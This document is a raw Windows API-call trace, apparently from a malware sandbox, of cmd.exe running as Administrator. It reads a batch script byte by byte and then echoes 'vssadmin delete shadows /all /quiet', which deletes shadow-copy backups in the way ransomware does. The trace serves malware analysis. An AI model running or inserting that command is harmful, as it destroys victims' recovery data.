	[0032.912] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.912] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e324, cchWideChar=1 | out: lpWideCharStr="se con cp select=1251\n") returned 1
	[0032.912] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.912] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.912] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.912] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e326, cchWideChar=1 | out: lpWideCharStr="a con cp select=1251\n") returned 1
	[0032.912] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.912] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.912] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.912] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e328, cchWideChar=1 | out: lpWideCharStr="dcon cp select=1251\n") returned 1
	[0032.912] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.912] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.912] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.913] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e32a, cchWideChar=1 | out: lpWideCharStr="mon cp select=1251\n") returned 1
	[0032.913] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.913] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.913] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.913] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e32c, cchWideChar=1 | out: lpWideCharStr="in cp select=1251\n") returned 1
	[0032.913] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.913] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.913] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.913] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e32e, cchWideChar=1 | out: lpWideCharStr="n cp select=1251\n") returned 1
	[0032.913] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.913] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.913] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.913] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e330, cchWideChar=1 | out: lpWideCharStr=" cp select=1251\n") returned 1
	[0032.913] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.913] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.913] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.913] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e332, cchWideChar=1 | out: lpWideCharStr="dp select=1251\n") returned 1
	[0032.913] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.913] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.913] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.913] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e334, cchWideChar=1 | out: lpWideCharStr="e select=1251\n") returned 1
	[0032.913] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.913] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.913] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.914] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e336, cchWideChar=1 | out: lpWideCharStr="lselect=1251\n") returned 1
	[0032.914] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.914] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.914] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.914] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e338, cchWideChar=1 | out: lpWideCharStr="eelect=1251\n") returned 1
	[0032.914] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.914] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.914] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.914] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e33a, cchWideChar=1 | out: lpWideCharStr="tlect=1251\n") returned 1
	[0032.914] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.914] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.914] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.914] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e33c, cchWideChar=1 | out: lpWideCharStr="eect=1251\n") returned 1
	[0032.914] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.914] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.914] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.914] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e33e, cchWideChar=1 | out: lpWideCharStr=" ct=1251\n") returned 1
	[0032.914] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.914] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.914] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.914] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e340, cchWideChar=1 | out: lpWideCharStr="st=1251\n") returned 1
	[0032.914] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.914] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.914] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.914] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e342, cchWideChar=1 | out: lpWideCharStr="h=1251\n") returned 1
	[0032.914] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.914] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.914] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.915] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e344, cchWideChar=1 | out: lpWideCharStr="a1251\n") returned 1
	[0032.915] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.915] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.915] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.915] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e346, cchWideChar=1 | out: lpWideCharStr="d251\n") returned 1
	[0032.915] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.915] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.915] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.915] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e348, cchWideChar=1 | out: lpWideCharStr="o51\n") returned 1
	[0032.915] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.915] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.915] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.915] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e34a, cchWideChar=1 | out: lpWideCharStr="w1\n") returned 1
	[0032.915] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.915] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.915] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.915] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e34c, cchWideChar=1 | out: lpWideCharStr="s\n") returned 1
	[0032.915] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.915] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.915] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.915] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e34e, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
	[0032.915] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.915] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.915] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.915] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e350, cchWideChar=1 | out: lpWideCharStr="/") returned 1
	[0032.915] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.915] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.915] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.916] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e352, cchWideChar=1 | out: lpWideCharStr="a") returned 1
	[0032.916] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.916] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.916] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.916] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e354, cchWideChar=1 | out: lpWideCharStr="l") returned 1
	[0032.916] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.916] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.916] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.916] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e356, cchWideChar=1 | out: lpWideCharStr="l") returned 1
	[0032.916] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.916] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.916] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.916] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e358, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
	[0032.916] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.916] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.916] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.916] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e35a, cchWideChar=1 | out: lpWideCharStr="/") returned 1
	[0032.916] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.916] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.916] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.916] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e35c, cchWideChar=1 | out: lpWideCharStr="q") returned 1
	[0032.916] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.916] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.916] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.916] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e35e, cchWideChar=1 | out: lpWideCharStr="u") returned 1
	[0032.916] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.916] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.916] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.917] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e360, cchWideChar=1 | out: lpWideCharStr="i") returned 1
	[0032.917] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.917] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.917] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.917] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e362, cchWideChar=1 | out: lpWideCharStr="e") returned 1
	[0032.917] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.917] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.917] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.917] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e364, cchWideChar=1 | out: lpWideCharStr="t") returned 1
	[0032.917] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.917] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.917] ReadFile (in: hFile=0xec, lpBuffer=0x4a52c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x13f458, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesRead=0x13f458*=0x1, lpOverlapped=0x0) returned 1
	[0032.917] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a52c320, cbMultiByte=1, lpWideCharStr=0x4a52e366, cchWideChar=1 | out: lpWideCharStr="\n") returned 1
	[0032.917] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.917] GetFileType (hFile=0xec) returned 0x3
	[0032.917] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.917] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0032.917] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0032.917] GetFileType (hFile=0xf8) returned 0x3
	[0032.917] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0032.917] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="vssadmin delete shadows /all /quiet\n", cchWideChar=-1, lpMultiByteStr=0x4a52c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vssadmin delete shadows /all /quiet\n", lpUsedDefaultChar=0x0) returned 37
	[0032.917] WriteFile (in: hFile=0xf8, lpBuffer=0x4a52c320*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x13f438, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesWritten=0x13f438*=0x24, lpOverlapped=0x0) returned 1
	[0032.917] GetProcessHeap () returned 0x2f0000
	[0032.917] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x4012) returned 0x30f630
	[0032.918] GetProcessHeap () returned 0x2f0000
	[0032.918] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30f630 | out: hHeap=0x2f0000) returned 1
	[0032.918] GetProcessHeap () returned 0x2f0000
	[0032.918] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb0) returned 0x3097e0
	[0032.918] GetProcessHeap () returned 0x2f0000
	[0032.918] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x22) returned 0x304610
	[0032.918] GetProcessHeap () returned 0x2f0000
	[0032.918] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x48) returned 0x30aa90
	[0032.919] GetConsoleOutputCP () returned 0x4e3
	[0032.919] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x4a52bfe0 | out: lpCPInfo=0x4a52bfe0) returned 1
	[0032.919] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0032.919] GetConsoleTitleW (in: lpConsoleTitle=0x13f3f0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a
	[0032.919] GetProcessHeap () returned 0x2f0000
	[0032.919] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x218) returned 0x309910
	[0032.919] GetProcessHeap () returned 0x2f0000
	[0032.919] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x5a) returned 0x309b30
	[0032.919] GetProcessHeap () returned 0x2f0000
	[0032.919] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x420) returned 0x309090
	[0032.919] SetErrorMode (uMode=0x0) returned 0x0
	[0032.919] SetErrorMode (uMode=0x1) returned 0x0
	[0032.919] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3090a0, lpFilePart=0x13ec80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x13ec80*="Desktop") returned 0x25
	[0032.919] SetErrorMode (uMode=0x0) returned 0x1
	[0032.920] GetProcessHeap () returned 0x2f0000
